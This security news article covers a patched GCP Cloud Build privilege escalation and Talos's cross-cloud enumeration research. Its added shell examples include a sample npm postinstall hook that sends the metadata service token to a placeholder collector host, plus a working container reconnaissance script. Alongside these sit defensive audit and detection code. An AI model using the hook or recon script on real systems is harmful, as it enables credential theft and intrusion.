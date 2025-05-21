A potential privilege escalation flaw affecting Google Cloud Platform (GCP) Cloud Functions and its Cloud Build service has been identified and investigated by security researchers.

The issue, initially discovered by Tenable Research, allowed an attacker with permission to create or update a Cloud Function to run code inside the Cloud Build job that packages the function and to obtain the access token of the default Cloud Build service account, which carried broader project permissions than the deploying identity.

Google has since issued a patch to mitigate the excessive privileges previously granted to default Cloud Build service accounts.

Attack Technique Repurposed Across Cloud Environments

Cisco Talos recently expanded upon Tenable’s findings by replicating the attack technique and testing its impact across multiple cloud platforms.

Researchers set up a Debian server in GCP with Node Package Manager (NPM) and Ngrok, then deployed a function whose package.json declared a malicious install script. Cloud Build runs npm install while packaging the function, so the script executed inside the build, where it could read the build identity's token from the metadata server and send it to the Ngrok listener. They confirmed that Google's patch has neutralized the original privilege escalation vector.

However, Talos demonstrated that the same approach could be adapted to perform environment enumeration – a reconnaissance tactic useful for mapping systems – even without privileged access.

By deploying the altered package.json in AWS Lambda and Azure Functions, Talos verified the tactic’s broader applicability across cloud services.
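To make the install-hook mechanism concrete, here is an added illustration (not code from Tenable, Talos or Google) of what such a package.json carries, together with a small pre-build audit that lists the lifecycle hooks a dependency would run and a defensive install that fetches packages without executing them. The manifest contents and COLLECTOR_URL are constructed placeholders (the researchers used an Ngrok tunnel); the metadata URL is GCP's standard token endpoint.

```shell
#!/bin/sh
# Added example, not code from Tenable, Talos or Google. Shows the shape of an
# npm lifecycle-hook attack and a pre-build audit that surfaces such hooks.
#
# Background: Cloud Build runs "npm install" while packaging a Node.js function,
# and npm executes a package's preinstall/install/postinstall/prepare scripts
# as part of that install. Those scripts therefore run with the identity of the
# build, which can query the GCE metadata server for that identity's token.

# Constructed sample manifest with a token-stealing postinstall hook.
# COLLECTOR_URL is a placeholder for the attacker's listener (the researchers
# used an Ngrok tunnel); the metadata URL is GCP's standard token endpoint.
write_sample_package_json() {
  cat > "$1" <<'EOF'
{
  "name": "innocuous-helper",
  "version": "1.0.0",
  "scripts": {
    "postinstall": "curl -s -H 'Metadata-Flavor: Google' http://metadata.google.internal/computeMetadata/v1/instance/service-accounts/default/token | curl -s -X POST --data-binary @- https://COLLECTOR_URL/"
  }
}
EOF
}

# Print every lifecycle hook declared in a package.json as "hook<TAB>command",
# one per line. Returns 1 when any hook is present so a build step can fail
# closed. The line-oriented sed is adequate as a gate on pretty-printed
# manifests (what npm writes); use jq for minified or hand-edited files.
lifecycle_hooks() {
  found=0
  for hook in preinstall install postinstall prepare prepublish; do
    cmd=$(sed -n "s/^[[:space:]]*\"$hook\"[[:space:]]*:[[:space:]]*\"\(.*\)\",*[[:space:]]*$/\1/p" "$1")
    if [ -n "$cmd" ]; then
      printf '%s\t%s\n' "$hook" "$cmd"
      found=1
    fi
  done
  [ "$found" -eq 0 ]
}

# Defensive install for a build step: fetch dependencies without executing any
# lifecycle scripts, then list the hooks each dependency would have run so a
# reviewer can approve them (or the build can fail) before anything executes.
safe_install() {
  npm ci --ignore-scripts --no-audit --no-fund || return 1
  find node_modules -name package.json -type f | while read -r f; do
    lifecycle_hooks "$f" | sed "s|^|$f: |"
  done
}
```

Run `write_sample_package_json /tmp/package.json; lifecycle_hooks /tmp/package.json` to see the hook the build would have executed; in a real pipeline, `safe_install` replaces the plain `npm install` step so that nothing from a dependency runs before it has been listed and reviewed.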

Enumeration Techniques Observed

The research highlighted several enumeration methods attackers could use to gather valuable system and network information:

ICMP discovery for network mapping

Detection of .dockerenv files to confirm containerized environments

CPU scheduling checks (the scheduler statistics of PID 1) to identify the init process and detect a PID namespace

Container ID and mount point analysis to find escape candidates, such as a mounted Docker socket or host path

Operating system and kernel detail extraction

User and permission scans to aid privilege escalation

Network traffic analysis for vulnerability assessment

These techniques need no privileged credentials, so they remain viable even where service accounts are correctly scoped.
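The checks in the list above, written out as an added example (not Talos's code) of what an unprivileged script can learn from a build or function container. Each parser takes a file argument with a live default, so it can be exercised on constructed samples as well as on the real /proc of a container; the paths and file layouts assumed are the common Linux ones, and listening sockets stand in for the broader network traffic analysis, which normally needs capture privileges.

```shell
#!/bin/sh
# Added example (not Talos's code): the enumeration checks as small shell
# functions that run unprivileged. Each takes a file path (live default shown)
# so it works on constructed samples and on a real container alike. Assumes
# common Linux layouts for /proc, /etc/os-release and /etc/passwd.

# 1. Container detection: Docker-style runtimes leave an empty /.dockerenv.
in_container_by_dockerenv() { [ -f "${1:-/}/.dockerenv" ]; }

# 2. Init-system check via scheduler statistics of PID 1. The first line of
#    /proc/1/sched is "<comm> (<pid>, #threads: N)". Most kernels print the pid
#    in the host namespace, so a value other than 1 reveals a PID namespace and
#    <comm> names the container entrypoint rather than systemd/init.
init_from_sched() {
  head -n 1 "${1:-/proc/1/sched}" | sed -n 's/^\([^ ]*\) (\([0-9]*\),.*/\1 \2/p'
}

# 3. Container ID from the cgroup path ("/docker/<id>", "/kubepods/.../<id>").
#    Empty under cgroup v2 with a private cgroup namespace; see 4 for a fallback.
container_id_from_cgroup() {
  grep -oE '[0-9a-f]{64}' "${1:-/proc/self/cgroup}" | head -n 1
}

# 4. Mount analysis. Docker bind-mounts hostname/resolv.conf from
#    /var/lib/docker/containers/<id>/ on the host, which leaks the ID even when
#    cgroups do not; a mounted docker.sock or host path is an escape candidate.
container_id_from_mountinfo() {
  grep -oE '/var/lib/docker/containers/[0-9a-f]{64}' "${1:-/proc/self/mountinfo}" |
    head -n 1 | sed 's|.*/||'
}
interesting_mounts() {
  grep -E 'overlay|/var/lib/docker|docker\.sock|/var/lib/kubelet|cgroup' "${1:-/proc/mounts}" || true
}

# 5. OS and kernel: the distro from os-release; the kernel from uname, which
#    reports the host kernel and so tells you what a container escape would face.
os_id() { sed -n 's/^ID=//p' "${1:-/etc/os-release}" | tr -d '"'; }
kernel_release() { uname -r; }

# 6. Users and permissions: accounts with a usable login shell, and paths the
#    current user can write (a writable build directory or cron path matters).
login_users() { awk -F: '$7 !~ /(nologin|false)$/ { print $1 }' "${1:-/etc/passwd}"; }
writable_paths() { for p in "$@"; do [ -w "$p" ] && printf '%s\n' "$p"; done; return 0; }

# 7. Network: listening TCP sockets straight from /proc/net/tcp (no ss/netstat
#    needed); column 4 is the socket state, 0A is LISTEN, and the port is hex.
listening_ports() {
  awk 'NR > 1 && $4 == "0A" { split($2, a, ":"); print a[2] }' "${1:-/proc/net/tcp}" |
    while read -r hexport; do printf '%d\n' "$((0x$hexport))"; done | sort -un
}

# 8. ICMP discovery of the /24 around the worker (Linux iputils ping syntax).
icmp_sweep() {
  prefix=$1; i=1
  while [ "$i" -le 254 ]; do
    ( ping -c 1 -W 1 "$prefix.$i" >/dev/null 2>&1 && printf '%s.%s\n' "$prefix" "$i" ) &
    i=$((i + 1))
  done
  wait
}

# Summary against the live system; opt in so sourcing the file has no effect.
enum_main() {
  in_container_by_dockerenv && echo "dockerenv: present" || echo "dockerenv: absent"
  echo "pid1: $(init_from_sched)"
  echo "container id: $(container_id_from_cgroup) $(container_id_from_mountinfo)"
  echo "os: $(os_id) kernel: $(kernel_release)"
  echo "login users: $(login_users | tr '\n' ' ')"
  echo "listening: $(listening_ports | tr '\n' ' ')"
  interesting_mounts
}
if [ "${ENUM_RUN:-0}" = "1" ]; then enum_main; fi
```

Run it with `ENUM_RUN=1 sh enum.sh` inside a container to see the full summary, or source the file and call the individual functions. None of the checks needs root, which is the point the Talos research makes: correctly scoped service accounts stop the token theft but not this reconnaissance, so egress monitoring and build-log review are what catch it.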

Google Responds and Mitigation Measures Advised

Following Tenable’s report, Google modified Cloud Build’s behavior and added new policies for more granular service account control. Talos verified that exfiltration of service account tokens using this method is no longer feasible in GCP.

To defend against similar threats, organizations are advised to:

Enforce the principle of least privilege for all service accounts

Regularly audit and monitor permissions

Alert on unexpected Cloud Function creations, updates and deletions

Inspect outgoing traffic from build workers and function runtimes for signs of exfiltration

Validate the integrity of external NPM packages, including the lifecycle scripts they would run at install time
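As an added example of the "alert on unexpected Cloud Function modifications" advice (not code from Google or the researchers), the following minimal detector runs over Cloud Audit Log entries exported as one JSON object per line, such as the output of a Cloud Logging sink to Cloud Storage, and flags Create/Update/Delete calls on functions by any principal outside an allowlist of known deployers. The allowlist, project name and sample log lines are constructed; the field names are those of Cloud Audit Logs, and the method names follow the Cloud Functions v1/v2 API service names, which you should confirm against your own logs.

```shell
#!/bin/sh
# Added example, not from the original research or from Google. A minimal
# detector for unexpected Cloud Function changes over audit-log entries
# exported as one JSON object per line (e.g. a Cloud Logging sink to GCS).
# Field names are those of Cloud Audit Logs; the allowlist, project and
# sample entries below are constructed for the demonstration.

# Constructed allowlist: identities that legitimately deploy functions.
ALLOWED_DEPLOYERS='ci-deployer@example-project.iam.gserviceaccount.com'

# Pull one JSON string field out of a single-line entry (no jq dependency).
json_field() { printf '%s' "$2" | sed -n "s/.*\"$1\":\"\([^\"]*\)\".*/\1/p"; }

# Print "timestamp principal method resource" for every function-mutating call
# whose caller is not an allowlisted deployer. $1 is the log file.
flag_unexpected_function_changes() {
  grep -E '"methodName":"google\.cloud\.functions\.v[12]\.[A-Za-z]+\.(Create|Update|Delete)Function"' "$1" |
  while read -r line; do
    principal=$(json_field principalEmail "$line")
    case ",$ALLOWED_DEPLOYERS," in *",$principal,"*) continue ;; esac
    method=$(json_field methodName "$line" | sed 's/.*\.//')
    printf '%s %s %s %s\n' "$(json_field timestamp "$line")" "$principal" \
      "$method" "$(json_field resourceName "$line")"
  done
}

# Constructed sample export: one legitimate update, one read, and two changes
# by principals that should not be deploying functions.
write_sample_log() {
  cat > "$1" <<'EOF'
{"protoPayload":{"methodName":"google.cloud.functions.v2.FunctionService.UpdateFunction","authenticationInfo":{"principalEmail":"ci-deployer@example-project.iam.gserviceaccount.com"},"resourceName":"projects/example-project/locations/us-central1/functions/hello"},"timestamp":"2025-05-20T09:58:11Z"}
{"protoPayload":{"methodName":"google.cloud.functions.v2.FunctionService.GetFunction","authenticationInfo":{"principalEmail":"alice@example.com"},"resourceName":"projects/example-project/locations/us-central1/functions/hello"},"timestamp":"2025-05-20T10:01:02Z"}
{"protoPayload":{"methodName":"google.cloud.functions.v2.FunctionService.UpdateFunction","authenticationInfo":{"principalEmail":"alice@example.com"},"resourceName":"projects/example-project/locations/us-central1/functions/hello"},"timestamp":"2025-05-20T10:03:40Z"}
{"protoPayload":{"methodName":"google.cloud.functions.v1.CloudFunctionsService.CreateFunction","authenticationInfo":{"principalEmail":"123456-compute@developer.gserviceaccount.com"},"resourceName":"projects/example-project/locations/us-central1/functions/helper"},"timestamp":"2025-05-20T10:07:15Z"}
EOF
}
```

`write_sample_log /tmp/audit.jsonl; flag_unexpected_function_changes /tmp/audit.jsonl` prints the two entries that deserve an alert: a human user updating a function directly and a compute service account creating one, both of which bypass the expected deployment pipeline. Reads (GetFunction) and changes by the allowlisted deployer are ignored, which keeps the alert volume low enough to be acted on.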

Though Google has addressed the original flaw, the research underscores the persistent risk posed by overly permissive configurations and the importance of continuous security monitoring across cloud environments.